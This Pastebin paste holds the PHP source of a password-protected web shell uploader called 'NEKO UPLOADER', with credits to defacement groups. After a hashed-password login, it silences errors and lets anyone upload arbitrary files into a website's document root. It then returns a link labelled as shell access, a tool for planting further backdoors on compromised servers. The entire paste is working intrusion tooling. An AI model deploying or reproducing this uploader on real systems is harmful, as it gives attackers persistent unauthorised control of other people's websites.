Advertisement
Guest User

danakontol

a guest
Oct 21st, 2018
69
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.38 KB | None | 0 0
  1. <?php
  2. $kriuk_pass = "144019a755d310a7a8f7cb6834ffcd30"; //
  3. session_start();
  4. @error_reporting(0);
  5. @set_time_limit(0);
  6. function Login() {
  7. ?><!DOCTYPE html>
  8. <html>
  9. <head>
  10. <title>NEKO UPLOADER</title>
  11. <link href="https://fonts.googleapis.com/css?family=Iceberg:400,700" rel="stylesheet" type="text/css">
  12.  
  13. <style>
  14. body {background: url(https://wallpapers.wallhaven.cc/wallpapers/full/wallhaven-616715.png) no-repeat center center fixed;
  15. background-size: cover;
  16. -webkit-background-size: cover;
  17. -moz-background-size: cover;
  18. -o-background-size: cover;
  19. }
  20. input[type=password] {
  21. width: 180px;
  22. height: 10px;
  23. color: red;
  24. background: transparent;
  25. border: 2px solid red;
  26. padding: 3px;
  27. text-align: center;
  28. }
  29. </style>
  30. <center>
  31. <br><br><br><br>
  32. <br><br><br><br>
  33. <br><br><br><br>
  34. <br><br><br><br>
  35. <br><br><br><br>
  36. <br><br><br><br>
  37. <br><br><br><br>
  38. <br><br>
  39. <form method="post">
  40. <font face ='Iceberg' size=4 color='red'>Password :
  41. <input type="password" name="pass" >
  42. <input type="submit" value="Login">
  43. </form>
  44.  
  45. <?php
  46. exit;
  47. }
  48. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  49. if( empty($kriuk_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $kriuk_pass) ) )
  50. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  51. else
  52. Login();
  53. ?>
  54. <title>NEKO UPLOADER M1ni</title>
  55. <style>
  56. body{cursor:url("http:///foro.elhacker.net/elhacker.cur"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
  57. body {
  58. background-color: #000000;
  59. background: url(https://i.redd.it/wkycp4a9c5e01.png) no-repeat center center fixed;
  60. background-size: cover;
  61. margin-left: 0px;
  62. margin-top: 0px;
  63. margin-right: 0px;
  64. margin-bottom: 0px;
  65. }
  66. .style1 {
  67. font-family: Arial, Helvetica, sans-serif;
  68. font-size: 12px;
  69. }
  70. </style>
  71. <center>
  72. <br><br><br>
  73. <body>
  74. <center>
  75. <?php
  76. echo "<form method='post' enctype='multipart/form-data'>
  77. <font color='white'><input type='file' name='idx_file'></font>
  78. <input type='submit' name='upload' value='upload'>
  79. </form>";
  80. $root = $_SERVER['DOCUMENT_ROOT'];
  81. $files = $_FILES['idx_file']['name'];
  82. $dest = $root.'/'.$files;
  83. if(isset($_POST['upload'])) {
  84. if(is_writable($root)) {
  85. if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
  86. $web = "http://".$_SERVER['HTTP_HOST']."/";
  87. echo "Akses Shell Nya Senpai -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
  88. } else {
  89. echo "Gagal Cok :(";
  90. }
  91. } else {
  92. if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
  93. echo "Akses Shell Nya : <b>$files</b> di folder ini";
  94. } else {
  95. echo "Gagal Cok :(";
  96. }
  97. }
  98. }
  99. ?>
  100. <br>
  101. </body>
  102. <font face='arial' size='2.5' color='Aqua'>[ Official D704T ]</font><br>
  103. <font face ='papyrus' size='3' color='red'>
  104. Mr.L3gacy - G3MB3ZT001 <font color="white">- Mr.A_404 - IdiotSec - Symax - J41 - KIRITO ID - <br>L3M4RI - Mr.BOTLINE - F4LKA </font><br>
  105. <br>
  106. <font size='1' face="Verdana" color="#FFFFFF">&#174; 2018 Ghost Hunter Illusion</font>
  107.  
  108. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement